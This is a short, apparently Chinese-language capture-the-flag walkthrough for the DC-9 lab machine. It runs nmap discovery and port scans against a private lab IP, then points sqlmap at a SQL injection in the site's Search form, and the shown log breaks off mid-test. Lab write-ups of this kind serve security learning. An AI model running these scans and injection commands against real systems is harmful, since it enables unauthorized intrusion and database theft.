2-1、DC 9
DC-9
扫描靶机IP地址
nmap scan IP
nmap -sP 192.168.49.1/24
find DC-9 IP address 192.168.49.105
portscan 192.168.49.105
nmap -p 1-65535 192.168.49.105
发现 22、80端口,但是22端口的状态是filtered
web
访问80端口
在’Search’ 页面中可以输入
测试后发现,Search
处存在sql注入
抓包保存到txt中,然后使用sqlmap
# sqlmap -r 1.txt --dbs 2 ⨯
___
__H__
___ ___[,]_____ ___ ___ {
1.5.5#stable}
|_ -| . ['] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 23:44:24 /2021-06-17/
[23:44:24] [INFO] parsing HTTP request from '1.txt'
[23:44:24] [INFO] testing connection to the target URL
[23:44:24] [INFO] checking if the target is protected by some kind of WAF/IPS
[23:44:24] [INFO] testing if the target URL content is stable
[23:44:25] [INFO] target URL content is stable
[23:44:25] [INFO] testing if POST parameter 'search' is dynamic
[23:44:25] [WARNING] POST parameter 'se